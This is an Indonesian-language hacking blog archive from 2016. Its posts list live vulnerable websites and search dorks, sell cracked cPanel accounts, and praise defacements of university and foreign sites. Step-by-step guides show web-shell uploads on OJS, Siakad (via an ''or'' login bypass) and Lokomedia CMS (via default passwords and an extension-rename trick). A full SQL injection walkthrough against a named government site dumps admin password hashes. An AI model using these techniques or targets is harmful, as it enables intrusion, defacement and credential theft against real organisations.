-

Thursday 8 December 2016

Live Target Joomla Com User

Halo Guys apa kabar hehe Udah Lama Nih Gak Update Live Target Deface Joomla Yaitu Com User oke Langsung aja Di coba Guys ;) JaNgan di rusak ya Live Target Nya ,, Hanya Buat Media Pembelajaran saja

LIVE Target :

- http://sercorp.cl/
-http://lighttouchhr.co.uk/

xixixi Knapa Kok cuman dikit Karna Mimin Males Save Web Yg Vuln Com User ...

Sunday 4 December 2016

Hack Gems,Elixir,Gold Clash Of Clans

Oke Guys Kali Ini Admin Mau Berbagi cara Bagaimana Agar Clash Of Clans Kita Cepat Naik TH Gak Usah Lama Lam Admin akan Share Bug Baru Yaitu Cheat Dari Brazil.. Langsung sedot gan :)

Link : ( http://hackcoc2016.allcleanararaquara.com.br/ )

Hasil Punya saya Gan ;)


Saturday 26 November 2016

Jual Cpanel Crack Murah Gan

Salam Sobat hehehe Kali Ini Admin tamvan Kluar dari topik Artikel Depes ya Gan hehehe..

Kali ini admin Mau Numpang Jualan dulu Gan .. Jualan Cpanel Crack

Yg Mau Beli silahkan :) Harga Per Cpanel 15k ..

Wednesday 14 September 2016

Dork Com User September 2016 Fress

Jumpa Lagi Guys dengan saya Admin Blog Yang Tamvan Hahha.. Oke Udah lama Nih Gak Coret" di Blog hehe .. Saya Kali Ini Mau share Lagi nih Dork Fress Com User Langsung aja Guys di sedot Yak sebelum habis target Web Vuln nya ...

Dork:

- Joomla! 1.7 Open site:net,id <== Bisa di Ganti Domain Lain ( Searching For Bing.com )
- Joomla! 1.6 Open site:net,id <== Bisa di Ganti Domain Lain ( Searching For Bing.com )
- May 25, 2016 Joomla! 1.7 Open Source <== ( Bisa di rubah Tanggal , Bulan atau Tahun nya )
- May 25, 2016 Joomla! 1.6 Open Source <== ( Bisa di rubah Tanggal , Bulan atau Tahun nya )

Oke Segitu Dulu Guys Share Dork Com User Nya .. Saya Share Lagi Nanti di Lain waktu hehe.. Stay aja di Blog saya Ya Guys .. Sekian Terimakasih udah Mampir ;)

 

Monday 27 June 2016

Cara Deface OJS ( Open Journal System )


Halo Sob Jumpa Lagi dengan saya Admin Blog yg Paling TamVan hehehe.. Oke Kali ini saya akan Share Cara Deface website OJS (  Open Journal Systems ) ada  Yg Tau apa Itu OJS?




OJS Adalah sebuah aplikasi Journal terbuka untuk Management yang biasa di gunakan dalam pemerintah, pendidikan & lembaga lain.

Type : Uploader File Data



Vuln : /index.php/index/user/register ( Bisa registrasi )


1. Kamu harus mendaftar dulu disini > site,com/index.php/index/user/register
-Jangan Lupa untuk mencentang Registrasi sebabagi Author / penulis & Jangan ceklis Email konfimasi

2. Setelah Registasi Klik "New Submission"
3. Selesaikan Step 1
4. Di Step 2, kamu dapat upload shell (format shell : a.phtml)

5. Jika sukses maka seperti ini
Penjelasan : 
Filename : 4-4-1-SM.phtml
4 = id user kamu

Shell Path : 
/files/journals/1/articles/[iduser]/submission/original/[nama file].phtml

Contoh : files/journals/1/articles/4/submission/original/4-4-1-SM.phtml

oke Sekian dari saya semoga Bermanfaat ..

Sunday 5 June 2016

Cara Deface Web Informasi Siakad

dork :
inurl:"?mnux=" intext:siakad
inurl:"?mnux=" intext:akademik
inurl:"?mnux=" intext:sisfo
inurl:"?mnux=" site:id
inurl:"?mnux=" site:com
inurl:"?mnux=" site:net 

live target : http://aplikasi.triatma-mapindo.ac.id/simak-stie/?mnux=

1. Copy lalu paste dork diatas ke google dan akan muncul target seperti gambar bawah. Silakan kalian pilih yg mau di deface...





2. setelah masuk tampilan awal akan seperti gambar bawah. trus kalian pilih super user.


3. Disini kita disuruh memasukan username dan password kalian masukkan aja username dan passwordnya '=''or' lalu login.


4. Bisa langkah ketiga tadi? kalo bisa tampilannya kayak gambar dibawah. Nah langkah selanjutnya kalian pilih menu keuangan >> 02 File Biaya Mhsw.


5. isikan semua kolom trus klik Upload File dari Bank jika sudah mengisi kolomnya.


6. akan muncul tempat upload silakan kalian upload shell kalian. Disini saya mengupload shell WSO.



7. Tunggu proses proses sampai selesai.


8. Untuk letak shell kalian tadi di folder mana, contoh disini kalian menggunakan live target maka letaknya http://siap.stba-pertiwi.ac.id/tmpbank/wso.php



sumber:https://selapancyber.blogspot.co.id

Friday 3 June 2016

Website CTEF Cyber Academy di Retas

Situs CTEF Cyber Academy di Retas Oleh Seoarang Defacer Dari Indonesia Yaitu dengan Nick name " ./51N1CH1 " Defacer ini Hanya Merubah Halaman Depan Websitenya saja ( Edit Artikel ) Tidak sampai Merusak Web Tersebut.. Defacer Kali ini Meninggalkan Sebuah Pesan  ” there is not perfect security in this world !! “  serta jajaran Sebuah Nick Name Mungkin Teman Nya ... berikut SS nya Gan..



-http://www.ctefcyberacademy.org/
-http://www.ctefcyberacademy.org/wp-content/plugins/bbpress/languages/index.php
-http://zone-h.org/mirror/id/26345971

sekian info dari saya .. sampai ketemu lagi 

Wednesday 25 May 2016

Dork Com_User 26 Mei 2016

Hai Gan Jumpa Lagi Dengan saya Admin Tamvan hehehe .. Udah lama Nih Gak Update tentang Dork Joomla Yaitu Com User Karena Sibuk kerja Dan Tentunya Dalam Dunia Gelap hehehe .. Oke Udah pada penasaran ya Dork Nya Yg Baru Kaya Gi Mana .. sabar ya Admin Tamvan Abis Dapet Dork terbaru dengan sedikit Kreasi dari saya sendiri dan tentunya Bantuan dri mbah google ... silahakan dork ada di Bawah Gan ..


Dork :

-inurl:index.php?format=feed&type=rss intext:Joomla! 1.7 Open Source

-inurl:index.php?format=feed&type=rss intext:Joomla! 1.6 Open Source

-inurl:component/content/category/ intext:Joomla! 1.7 Open Source

-inurl:component/content/category/ intext:Joomla! 1.6 Open Source

Dork Bisa di Kembangkan Lagi Bisa di tambah Site:com,Net, Dll ..

Sekian dulu dari saya Semoga Bermanfaat ..

Quote: Dalam Dunia Hacking tidak ada Yg Sulit Semua Perlu Kesabaran dan Keseriusan Dalam Belajar agar Anda Bisa ;) Semua Tergantung Diri Anda sendiri

Sunday 15 May 2016

Deface Dengan SQL Injection





Pengertian SQL Injection 

SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : 

id=$id;……. > Got Error 

Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.


Contoh : 

http://situstarget.com/news.php?id=1’ 
http://situstarget.com/news.php?id=’1

Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

Dork SQLi :



inurl:azerty.php?id= , 
inurl:bouquin.php?id= , 
inurl:lien.php?id= , 
inurl:clavier.php?id= 
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
Live target : http://diklat.lampungprov.go.id/more.php?id=1



Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error

  
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error



Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.


Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--



Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh: 
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--




Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--


Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabeltbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--


Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--



Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya.


Sumber : indocyberarmy

Cyber War Antara Hacker Philipine Vs Indonesia

Perang Cyber antara hacker Filipina dan hacker Indonesia . Hal ini dapat dilihat setelah website yang berbeda telah dirusak oleh tentara maya pada Pertengahan Tahun 2015

Terjadinya Perang Cyber ini di picu oleh aakan di eksekusi terpidana mati Mary Jane Veloso di Indonesia. hacker Pinoy menyebut diri mereka BloodSec Internasional merusak beberapa situs web Indonesia untuk menunjukkan protes dan meminta grasi Veloso.

Ini adalah hacker yang sama yang hack beberapa subdomians dari Globe pada November 2014.
Namun hacker Indonesia tidak tinggal dia mereka mengatas namakan dari team " Java Intelegent Cyber " Melakukan Serangan Balasan terhadap Situs Dari Negara Philipine, mereka telah menulis sebuah surat terbuka untuk memperingatkan Pinoy hacker ( BllodSec Internasional ) atas tindakan mereka. Mereka menulis pesan yang bersumber dari pepatah pastebin,berikut pesan dari Hacker Indonesia

"We ask you destination, why you hacked our website.. You start because one of your sites. deped-davaocity.com and you hacked 30+ Indonesian sites. We launch the attack and stated this is a cyber war , remember it."
"We are anonymous Indonesia, we remain silent, we stand here to destroy your site. "
 
 

Wednesday 11 May 2016

Website InfoSec.asia Australia Di Deface

Lagi-lagi Anak Bangsa Melakukan Defacement Website Kali ini Yang menjadi sasaran adalah Website Milik Negeri Kanguru Yaitu ( Australia ) Defacer dengan Code Name ( ./51N1CH1 ) Dan ( Shiro'Tenshi ) Kali ini Bekerja sama Untuk menguji System Security Web Tersebut . Yang berasal dari Team " INDONESIAN INTELEGENT SECURITY "

Teruslah Berkreasi Demi Memajukan ilmu IT di Bangsa kita ini..




Link Web : http://infosec.asia/
Mirror      : http://zone-h.org/mirror/id/26247671

Sekian sekilas Info Dari saya Sampai Jumpa Lagi.

Tuesday 10 May 2016

Sub Domain Universitas Negeri Khairun Di DEFACE







Sub Domain UNKHAIR Terkena Deface Lagi-Lagi Para Defacer Meretas sebuah Web Milik Universitas Ternate yaitu dengan Code Name " ./51N1CH1 " dari "Indonesian Intelegent Security" entah apa Motif Sang Defacer mendeface Web itu .apakah hanya ingin Test security Websitenya? itu yg menjadi sebuah pertanyaan saya hehe

Namun sang Defacer Tidak sampai merusak Websitenya Karena Sang Defacer Hanya Menitipkan Sebuah file . ( x.php )


Semoga Admin Web Nya bisa membenahi Celah/Bug Web tersebut agar tidak kembali terkena Deface .

berikut Subdomain yg menjadi Target sang Defacer


http://acil.unkhair.ac.id/x.php
http://aseng.unkhair.ac.id/x.php
http://mangrove.unkhair.ac.id/x.php
http://muliadi.unkhair.ac.id/x.php
http://perikanan.unkhair.ac.id/x.php
http://pertanian.unkhair.ac.id/x.php
http://sofyansamad.unkhair.ac.id/x.php

Sekian Berita Kali ini Semoga Bermanfaat Sampai Jumpa Lagi .



Deface Web Dengan Bug CMS LOKOMEDIA

pasti udah pada tau kan Tehnik Deface yg satu ini hehehe karena POC ini sangat di sukai sama para Defacer Karena mengarah ke domain ID ( Indonesia ) :v wkwkwkwk oke langsung aja simak Gan

Ada Macam-macam Bug di CMS Lokomedia ini :D

1. Default User and Password ~

- User  : Password -

admin : admin
wiro : sableng
wiros : sabdi
joko : sembung
sinto : gendeng

2. Upload Shell Langsung Tanpa Harus Login Admin ^_^

Ingad /adminweb/ nya bisa diganti Yah Sesuai path Admin Loginnya :v /

Exploit :

-  adminweb/content.php?module=download 
-  adminweb/content.php?module=banner
-  adminweb/content.php?module=berita


Nah Langsung Saja Kita bahas Cara2 nya >_< :D /
Disini Saya  Memakai Teknik Yang pertama Yaitu dengan Bug Default User and Password :D /

Oke Langsung Saja Kita Cari Targetnya dulu :v /

Dork nya ini : module=download intext:"cileungsi"

Dork Bisa Di Kembangin yah Kalo Mau Berhasil & Dapet Banyak Target Pastinya wkwk :v /

Nah gw Udah Dapet Target nih http://cyberandry.com/ Sebagai Kelinci Percobaan wkwk :v /

Sekarang coba buka Letak Login Adminnya ^_^
Biasa nya lokomedia :

/adminweb , /admin , /administrator


Kalau ga Ketemu ya bisa Pakai Admin Login Snanner kak :D /

Nah gw Udah Ketemu nih Admin Loginnya http://cyberandry.com/adminweb/ :D /

Coba Kamu Login Dengan Default User and Password Tadi Yang Saya Kasih Diatas :D 


 

Nah saya Berhasil Masuk wkwk :v

 

Nah Yang jadi Pertanyaan Gimana Cara Upload Shellnya ? :o
wkwk Tenang Vroh Ga Usah Panik kakak :v :v /
Cari Aja Fitur Yang Ada Uploader nya :D 
Nah Kalau Saya masang Shell nya Lewat Pasang Banner :D 
Klik " Banner "  - Terus  Klik " Tambah Banner " :D

Nah diKarenakan ga bisa Upload File Ber-Ekstensikan .php Terpaksa kita pakaiLive Http Headers Deh wkwkw Atau Tamper Data :v /



Kalau Belom Punya bisa di download Disini - > ( Live Http Headers ) atau Disini ( Temper Data ) :))

Kalau Saya Memakai Live Http Headers :D /

Nah Langsung aja ~ Rename Shell Kalian Jadi Formatnya gini shellkamu.php.jpg:D  

Lalu Klik " Tambah Banner " ~  

Isi Data2 nya Ngasal aja Kak wkwk :v 

  

Lalu Klik Simpan ~ Nah Lalu Segera Kalian Buka Fitur Live Http Headers tadi :)
Klik Tools - Lalu Klik " Live HTTP Headers " ~

 

Kalo Sudah Lalu Kita Rename shell nya :D jadi enzy-leovarisa.php.jpg Jadi enzy-leovarisa.php :D
Caranya Kita Cari File Yang Kalian Upload Tadi ~ Lihat Gambar Diatas :D 
Lalu Klik Replay :D

 

Kalo Sudah & Sukses ~ Klik Edit Pada Banner Yang Kalian Sudah Upload :D
Nanti Ada Gambar ( Kaya Foto Pecah2/ Rusak wkwk ) ~ Terus Kalian Klik Kanan di Gambar itu ~ Terus Klik " View Image " :D

  

Atau Bisa Juga Tinggal Kalian Panggil Shell Kalian :D
Caranya Kaya gini www.site.com/foto_banner/namashell.php

Shell Saya Nih http://www.cyberandry.com/foto_banner/enzy-leovarisa.php wkwk :D

  

Wkwkwk Muncul Deh Shell nya :v

Thanks To Intelsect :*

Newer Posts Older Posts Home